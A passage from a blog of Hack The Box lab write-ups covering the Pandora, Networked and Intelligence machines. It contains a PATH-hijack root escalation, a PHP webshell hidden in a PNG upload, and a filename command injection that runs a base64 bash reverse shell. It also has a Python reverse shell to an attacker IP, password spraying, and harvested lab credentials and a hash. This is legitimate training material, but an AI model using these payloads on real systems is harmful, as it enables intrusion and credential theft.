problem disappears and tar does run as root.\nThe SUID binary is now exploitable:\nmatt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client Backup successful! Terminating program!\nHere is a simple exploitation example. We create a file named \"tar\" containing the command /bin/bash, make it executable, and put the directory containing it (matt's home directory) at the front of the $PATH variable. 
Running which confirms that our tar has replaced the real command. All that is left is to run the SUID binary pandora_backup to get a shell as root:\nmatt@pandora:~$ echo \"/bin/bash\" > tar matt@pandora:~$ chmod +x tar matt@pandora:~$ export PATH=/home/matt:$PATH matt@pandora:~# which tar /home/matt/tar matt@pandora:~$ /usr/bin/pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client root@pandora:~# whoami root root@pandora:~# cat /root/root.txt fd9c.....291d\nTips\nAlways run a UDP port scan: a quick one first, then a full one if nothing else turns up.\nIf SSH is open: always try generating an SSH key pair, placing the .pub in authorized_keys and logging in. On this box it was impossible to run sudo -l, and a bug prevented exploiting the SUID binary pandora_backup. Through the SSH session the bug was gone. So when in doubt: always try an SSH connection. 
To check whether key-based SSH login is possible, look at the server-side SSH configuration file /etc/ssh/sshd_config. If:\n#PubkeyAuthentication yes --> commented out, default value \"yes\", so it is possible\n#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 --> commented out, default \".ssh/authorized_keys\", so that is fine\nAllowUsers daniel matt --> only these users may log in over SSH\nUsePAM yes --> classic password login works through PAM, but this does not block keys ","date":"2025-09-05T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/pandora-htb/","title":"HTB | Pandora"},{"content":" Machine name OS IP Difficulty Networked Linux 10.10.10.146 Easy\nEnumeration\nnmap\n$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.146 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 2275d7a74f81a7af5266e52744b1015b (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd | 256 2d6328fca299c7d435b9459a4b38f9c8 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8= | 256 73cda05b84107da71c7c611df554cfc4 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMrhnJBfdb0fWQsWVfynAxcQ8+SNlL38vl8VJaaqPTL 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-server-header: 
Apache/2.4.6 (CentOS) PHP/5.4.16 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 443/tcp closed https reset ttl 63\nFoothold\nWebsite : Port 80\nOn the site we find the following message.\nHello mate, we're building the new FaceMash! Help by funding us and be the new Tyler&Cameron! Join us at the pool party this Sat to get a glimpse\ndirsearch : /backup.tar, /upload.php\nAt the web root there is a backup.tar archive containing the site's source code. We also find a page for uploading images and a page, \"photos.php\", for viewing them. An /uploads directory appears to hold the uploaded photos.\ndirsearch -u http://10.10.10.146 _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://10.10.10.146/ [13:59:45] Scanning: [13:59:53] 301 - 235B - /backup -> http://10.10.10.146/backup/ [13:59:53] 200 - 885B - /backup/ [13:59:53] 403 - 210B - /cgi-bin/ [13:59:55] 200 - 229B - /index.php [13:59:55] 200 - 229B - /index.php/login/ [13:59:57] 200 - 1KB - /photos.php [14:00:00] 200 - 169B - /upload.php [14:00:00] 301 - 236B - /uploads -> http://10.10.10.146/uploads/ [14:00:00] 200 - 2B - /uploads/ Task Completed\nFile Upload : RCE\nAfter reviewing the source code recovered from backup.tar, we see that /photos.php displays the images uploaded through /upload.php.\nAfter some testing and analysis of the PHP code, we manage to upload a PHP file and execute code. To do so, I first uploaded a genuine PNG image, then changed its extension to \".php.png\". 
Then the image data had to be removed and replaced with PHP code. The important part was to keep the \"PNG\" magic bytes, i.e. the leading bytes of the file by which it is recognised as a PNG image.\nPOST /upload.php HTTP/1.1 Host: 10.10.10.146 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------19843469784126652896583145162 Content-Length: 383 Origin: http://10.10.10.146 Connection: keep-alive Referer: http://10.10.10.146/upload.php Upgrade-Insecure-Requests: 1 Priority: u=0, i -----------------------------19843469784126652896583145162 Content-Disposition: form-data; name=\"myFile\"; filename=\"htb-logo.php.png\" Content-Type: image/png PNG \u001a <?php system($_REQUEST['cmd']); ?> -----------------------------19843469784126652896583145162 Content-Disposition: form-data; name=\"submit\" go! -----------------------------19843469784126652896583145162--\nTo get a better reverse shell, I then uploaded the \"Reverse shell Pentest Monkey\" code to obtain a stable shell:\n$ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:56866. 
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 14:59:42 up 1:04, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) bash: no job control in this shell bash-4.2$ whoami apache\napache -> guly\nImproper sanitization : Command Injection\nIn the home directory of the user guly we find a check_attack.php file and a crontab showing that guly runs this PHP file every 3 minutes.\nIt iterates over the website's /uploads directory and, if a file name does not contain a valid IP address, runs a command to delete the file.\nHowever, it calls exec() with /bin/rm instead of a regular PHP function for deleting a file, and the file name is interpolated into the command line without escaping. This lets us create a file whose name contains \";\" so that any Bash command gets executed!\nbash-4.2$ cat check_attack.php\n<?php\nrequire '/var/www/html/lib.php';\n$path = '/var/www/html/uploads/';\n$logpath = '/tmp/attack.log';\n$to = 'guly';\n$msg= '';\n$headers = \"X-Mailer: check_attack.php\\r\\n\";\n$files = array();\n$files = preg_grep('/^([^.])/', scandir($path));\nforeach ($files as $key => $value) {\n  $msg='';\n  if ($value == 'index.html') {\n    continue;\n  }\n  #echo \"-------------\\n\";\n  #print \"check: $value\\n\";\n  list ($name,$ext) = getnameCheck($value);\n  $check = check_ip($name,$value);\n\n  if (!($check[0])) {\n    echo \"attack!\\n\";\n    # todo: attach file\n    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);\n\n    exec(\"rm -f $logpath\");\n    exec(\"nohup /bin/rm -f $path$value > /dev/null 2>&1 &\");\n    echo \"rm -f $path$value\\n\";\n    mail($to, $msg, $msg, $headers, \"-F$value\");\n  }\n}\n\n?>\nbash-4.2$ cat crontab.guly\n*/3 * * * * php /home/guly/check_attack.php\nHere is an example of a file name that lets us easily get a reverse shell:\ncd /var/www/html/uploads\ntouch 'a; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMQ== | base64 -d | bash; ls'\n# Here is the command\n# nohup /bin/rm -f $path$value > /dev/null 2>&1 &\n# Here is what the program will actually execute\nnohup /bin/rm -f /var/www/html/uploads/a; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMQ== | base64 -d | bash; ls > /dev/null 2>&1 &\nWe obtain a shell as guly:\n$ nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:47670. 
bash: no job control in this shell [guly@networked ~]$ whoami whoami guly [guly@networked ~]$ python2 -c 'import pty;pty.spawn(\"/bin/bash\")' python2 -c 'import pty;pty.spawn(\"/bin/bash\")' [guly@networked ~]$ export TERM=xterm export TERM=xterm [guly@networked ~]$ ^Z [1] + 4656 suspended nc -lnvp 9001 $ stty raw -echo;fg [1] + 4656 continued nc -lnvp 9001 [guly@networked ~]$ [guly@networked ~]$ ls check_attack.php crontab.guly\tk user.txt [guly@networked ~]$ cat user.txt 37e0.....3b8\nguly -> root\nEnumeration\n[guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-guly DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no NAME=ps /tmp/foo PROXY_METHOD=asodih BROWSER_ONLY=asdoih BOOTPROTO=asdoih [guly@networked ~]$ sudo -l Matching Defaults entries for guly on networked: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=\"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\", env_keep+=\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\", secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin User guly may run the following commands on networked: (root) NOPASSWD: /usr/local/sbin/changename.sh\n/usr/local/sbin/changename.sh\nThe script asks us for several values: NAME, PROXY_METHOD...\nThese values are written to a file: /etc/sysconfig/network-scripts/ifcfg-guly\nThen the following command is run: /sbin/ifup guly0\nSo this file configures an interface, which is then brought up with \"/sbin/ifup INTERFACE\".\nAfter some research online, and based on the hint provided, it appears that a command injection is possible through the interface file: ifcfg files are sourced by the network scripts, so each line is executed as Bash code.\nSo when we write:\nNAME=VALUE COMMAND ARGS\nNAME does get the value VALUE, but what follows is executed as a command, and arguments can be passed if needed.\nWhen the interface is brought up, the malicious Bash code is executed immediately.\nThere is a filter, but it is not sufficient: the regex allows spaces and slashes, so a second word on the line is accepted and ends up being run as a command.\n[guly@networked ~]$ cat /usr/local/sbin/changename.sh\n#!/bin/bash -p\ncat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF\nDEVICE=guly0\nONBOOT=no\nNM_CONTROLLED=no\nEoF\n\nregexp=\"^[a-zA-Z0-9_\\ /-]+$\"\n\nfor var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do\n  echo \"interface $var:\"\n  read x\n  while [[ ! $x =~ $regexp ]]; do\n    echo \"wrong input, try again\"\n    echo \"interface $var:\"\n    read x\n  done\n  echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly\ndone\n\n/sbin/ifup guly0\n[guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-guly\nDEVICE=guly0\nONBOOT=no\nNM_CONTROLLED=no\nNAME=ps /tmp/foo\nPROXY_METHOD=eee\nBROWSER_ONLY=eee\nBOOTPROTO=eee\nCommand Injection\nWe create a file \"/tmp/shell\" with code that opens a reverse shell. Here I chose a Python reverse shell. 
But a classic Bash one-liner would have worked too.\n[guly@networked ~]$ cat /tmp/shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"bash\")'\nThen we run the script with sudo and, for the variable, supply a value followed by the path of our program to open the reverse shell:\n[guly@networked ~]$ sudo /usr/local/sbin/changename.sh interface NAME: randomtext /tmp/shell interface PROXY_METHOD: randomtext interface BROWSER_ONLY: randomtext interface BOOTPROTO: randomtext ----------------------------------- nc -lnvp 7777 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::7777 Ncat: Listening on 0.0.0.0:7777 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:58160. 
[root@networked network-scripts]# cat /root/root.txt cat /root/root.txt d1ce.....e93 ","date":"2025-09-04T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/networked-htb/","title":"HTB | Networked"},{"content":" Machine name OS IP Difficulty Intelligence Windows 10.10.10.248 Medium\nUsers\nTiffany.Molina : NewIntelligenceCorpUser9876 Ted.Graves : Mr.Teddy svc_int$:::1dcabcce2cf522bae77d7dc622587879\nEnumeration\nnmap\n$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.248 PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: Intelligence |_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-03 19:34:02Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 |_ssl-date: 2025-09-03T19:35:37+00:00; +7h00m00s from scanner time. 
445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-09-03T19:35:36+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-09-03T19:35:37+00:00; +7h00m00s from scanner time. 
| ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 |_ssl-date: 2025-09-03T19:35:36+00:00; +7h00m00s from scanner time. 
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49691/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49713/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC\nFoothold\nintelligence.htb\nA website is served on port 80.\nFuzzing files\nThe home page links to a file:\nhttp://intelligence.htb/documents/2020-01-01-upload.pdf\nA second link points to a file named with a different date.\nWe deduce that other files may exist if we fuzz the date part of the name.\nAs a first test we write a Python script that enumerates every date in this format from 2015 to 2022, and redirect the list to a file.\nfrom datetime import date, timedelta\n\ndef daterange(start_date: date, end_date: date):\n    days = int((end_date - start_date).days)\n    for n in range(days):\n        yield start_date + timedelta(n)\n\nstart_date = date(2015, 1, 1)\nend_date = date(2022, 6, 2)\nfor single_date in daterange(start_date, end_date):\n    print(single_date.strftime(\"%Y-%m-%d\"))\nThen we use ffuf to fuzz and collect the URLs of all potentially downloadable files:\n$ ffuf -c -w dates.txt -u \"http://intelligence.htb/documents/FUZZ-upload.pdf\" -o results.json -of json /'___\\ /'___\\ /'___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev 
________________________________________________ :: Method : GET :: URL : http://intelligence.htb/documents/FUZZ-upload.pdf :: Wordlist : FUZZ: /workspace/Intelligence/dates.txt :: Output file : results.json :: File format : json :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ 2020-01-01 [Status: 200, Size: 26835, Words: 241, Lines: 209, Duration: 35ms] 2020-01-02 [Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 31ms] 2020-01-25 [Status: 200, Size: 26252, Words: 225, Lines: 193, Duration: 24ms] 2020-01-20 [Status: 200, Size: 11632, Words: 157, Lines: 127, Duration: 27ms] 2020-01-23 [Status: 200, Size: 11557, Words: 167, Lines: 136, Duration: 35ms] 2020-01-22 [Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 37ms] 2020-01-10 [Status: 200, Size: 26400, Words: 232, Lines: 205, Duration: 40ms] 2020-01-04 [Status: 200, Size: 27522, Words: 223, Lines: 196, Duration: 49ms] 2020-01-30 [Status: 200, Size: 26706, Words: 242, Lines: 193, Duration: 39ms] 2020-02-24 [Status: 200, Size: 27332, Words: 237, Lines: 206, Duration: 23ms] 2020-03-04 [Status: 200, Size: 26194, Words: 235, Lines: 202, Duration: 21ms] 2020-02-28 [Status: 200, Size: 11543, Words: 167, Lines: 131, Duration: 23ms] 2020-02-11 [Status: 200, Size: 25245, Words: 241, Lines: 198, Duration: 29ms] 2020-02-17 [Status: 200, Size: 11228, Words: 167, Lines: 132, Duration: 29ms] 2020-02-23 [Status: 200, Size: 27378, Words: 247, Lines: 213, Duration: 33ms] 2020-03-05 [Status: 200, Size: 26124, Words: 221, Lines: 205, Duration: 33ms] 2020-03-12 [Status: 200, Size: 27143, Words: 233, Lines: 213, Duration: 24ms] 2020-03-21 [Status: 200, Size: 11250, Words: 157, Lines: 134, Duration: 24ms] ... 
2021-03-25 [Status: 200, Size: 27327, Words: 231, Lines: 211, Duration: 22ms] 2021-03-21 [Status: 200, Size: 26810, Words: 229, Lines: 205, Duration: 31ms] 2021-03-27 [Status: 200, Size: 12127, Words: 166, Lines: 141, Duration: 28ms] :: Progress: [2709/2709] :: Job [1/1] :: 1562 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\nNext we iterate over this list of URLs to download all the files. In Python:\ncat ffuf_dl.py\nimport json\nimport subprocess\n\nwith open(\"results.json\") as f:\n    data = json.load(f)\n\nfor result in data[\"results\"]:\n    url = result[\"url\"]\n    print(f\"[*] Téléchargement de {url}\")\n    subprocess.run([\"wget\", \"-q\", \"-P\", \"pdfs/\", url])\nThe pdfs/ directory now holds a large number of files.\nPassword found in pdfs\nI used pdftotext to convert the PDFs to text. Then, dumping the text of all the PDFs and searching for the keyword \"password\", we get a match! The password: NewIntelligenceCorpUser9876\n$ for f in *.pdf\ndo\npdftotext $f\ndone\n$ cat *.txt | grep -i password -A3 -B3\nNew Account Guide Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876 After logging in please change your password as soon as possible.\nWe also find the following message:\nInternal IT Update There has recently been some outages on our web servers. Ted has gotten a script in place to help notify us if this happens again. Also, after discussion following our recent security audit we are in the process of locking down our service accounts. 
User list from pdfs creators\nWith exiftool we can recover a lot of metadata from the PDFs, in particular the name of the creator who generated each one. This gives us a list of potential usernames.\nexiftool pdfs/*.pdf | grep -i creator | awk '{print $3}' William.Lee Scott.Scott ... Tiffany.Molina <----------- ... Ian.Duncan Richard.Williams\nWith kerbrute we can check whether these users exist; in fact most of them do. With nxc we perform a password spray and find the following credentials: intelligence.htb\\Tiffany.Molina:NewIntelligenceCorpUser9876\n$ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/ Version: dev (n/a) - 09/03/25 - Ronnie Flathers @ropnop 2025/09/03 16:03:02 > Using KDC(s): 2025/09/03 16:03:02 > dc.intelligence.htb:88 2025/09/03 16:03:02 > [+] VALID USERNAME:\tStephanie.Young@intelligence.htb 2025/09/03 16:03:02 > [+] VALID USERNAME:\tVeronica.Patel@intelligence.htb 2025/09/03 16:03:02 > [+] VALID USERNAME:\tJason.Wright@intelligence.htb 2025/09/03 16:03:02 > [+] VALID USERNAME:\tDavid.Reed@intelligence.htb 2025/09/03 16:03:02 > [+] VALID USERNAME:\tScott.Scott@intelligence.htb ...... $ nxc smb 10.10.10.248 -u users.txt -p pass.txt SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False) SMB 10.10.10.248 445 DC [-] intelligence.htb\\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE ... 
SMB 10.10.10.248 445 DC [-] intelligence.htb\\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [+] intelligence.htb\\Tiffany.Molina:NewIntelligenceCorpUser9876 Tiffany.Molina : user flag On trouve un Share User accessible en lecture par Tiffany. On trouve finalement les fichiers de Tiffany et le flag user.txt\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 smbclient //10.10.10.248/users -U \u0026#39;Tiffany.Molina%NewIntelligenceCorpUser9876\u0026#39; Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . DR 0 Mon Apr 19 03:20:26 2021 .. DR 0 Mon Apr 19 03:20:26 2021 Administrator D 0 Mon Apr 19 02:18:39 2021 All Users DHSrn 0 Sat Sep 15 09:21:46 2018 Default DHR 0 Mon Apr 19 04:17:40 2021 Default User DHSrn 0 Sat Sep 15 09:21:46 2018 desktop.ini AHS 174 Sat Sep 15 09:11:27 2018 Public DR 0 Mon Apr 19 02:18:39 2021 Ted.Graves D 0 Mon Apr 19 03:20:26 2021 Tiffany.Molina D 0 Mon Apr 19 02:51:46 2021 3770367 blocks of size 4096. 1453992 blocks available smb: \\\u0026gt; cd Tiffany.molina smb: \\Tiffany.molina\\\u0026gt; cd Desktop smb: \\Tiffany.molina\\Desktop\\\u0026gt; ls . DR 0 Mon Apr 19 02:51:46 2021 .. DR 0 Mon Apr 19 02:51:46 2021 user.txt AR 34 Wed Sep 3 21:31:06 2025 3770367 blocks of size 4096. 
1453992 blocks available smb: \\Tiffany.molina\\Desktop\\\u0026gt; get user.txt getting file \\Tiffany.molina\\Desktop\\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) smb: \\Tiffany.molina\\Desktop\\\u0026gt; $ cat user.txt 359b.....159e Rusthound bloodhound 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 $ rusthound -d intelligence.htb -u \u0026#34;Tiffany.Molina\u0026#34;@\u0026#34;intelligence.htb\u0026#34; -p \u0026#34;NewIntelligenceCorpUser9876\u0026#34; -o /workspace/Intelligence/bloodhount_data --zip -n 10.10.10.248 --------------------------------------------------- Initializing RustHound at 16:50:28 on 09/03/25 Powered by g0h4n from OpenCyber --------------------------------------------------- [2025-09-03T14:50:28Z INFO rusthound] Verbosity level: Info [2025-09-03T14:50:28Z INFO rusthound::ldap] Connected to INTELLIGENCE.HTB Active Directory! [2025-09-03T14:50:28Z INFO rusthound::ldap] Starting data collection... [2025-09-03T14:50:28Z INFO rusthound::ldap] All data collected for NamingContext DC=intelligence,DC=htb [2025-09-03T14:50:28Z INFO rusthound::json::parser] Starting the LDAP objects parsing... [2025-09-03T14:50:28Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10 [2025-09-03T14:50:28Z INFO rusthound::json::parser] Parsing LDAP objects finished! [2025-09-03T14:50:28Z INFO rusthound::json::checker] Starting checker to replace some values... [2025-09-03T14:50:28Z INFO rusthound::json::checker] Checking and replacing some values finished! [2025-09-03T14:50:28Z INFO rusthound::json::maker] 43 users parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 63 groups parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 1 computers parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 1 ous parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 1 domains parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] 2 gpos parsed! 
[2025-09-03T14:50:29Z INFO rusthound::json::maker] 21 containers parsed! [2025-09-03T14:50:29Z INFO rusthound::json::maker] /workspace/Intelligence/bloodhount_data/20250903165028_intelligence-htb_rusthound.zip created! RustHound Enumeration Completed at 16:50:29 on 09/03/25! Happy Graphing! Tiffany.Molina -\u0026gt; Ted.Graves SMB : IT Share En se connectant au share IT on remarque un script powershell. Ce script parcourt tous les domaines DNS enregistrés commencant par \u0026ldquo;web\u0026rdquo; puis effectue une requête HTTP avec Invoke-WebRequest. Si le site n\u0026rsquo;est pas actif, alors la requête echoue et un mail est envoyé à Ted.\nIl est indiqué que le script est executé toutes les 5mn, et vraisembablement est executé par Ted lui même. On remarque l\u0026rsquo;utilisation du paramètre -UseDefaultCredentials ce qui signifie que les creds de celui qui l\u0026rsquo;execute sont transmis lors de la requête.\nSi on arrive à detourner le script pour lui faire faire une requête vers notre ordinateur, on pourrait recupérer le mot de passe de Ted.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 smbclient //10.10.10.248/it -U \u0026#39;Tiffany.Molina%NewIntelligenceCorpUser9876\u0026#39; Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . D 0 Mon Apr 19 02:50:55 2021 .. D 0 Mon Apr 19 02:50:55 2021 downdetector.ps1 A 1046 Mon Apr 19 02:50:55 2021 3770367 blocks of size 4096. 1453177 blocks available smb: \\\u0026gt; get downdetector.ps1 getting file \\downdetector.ps1 of size 1046 as downdetector.ps1 (13.4 KiloBytes/sec) (average 13.4 KiloBytes/sec) smb: \\\u0026gt; [Sep 03, 2025 - 17:13:40 (CEST)] exegol-pentest Intelligence # cat downdetector.ps1 ��# Check web server status. 
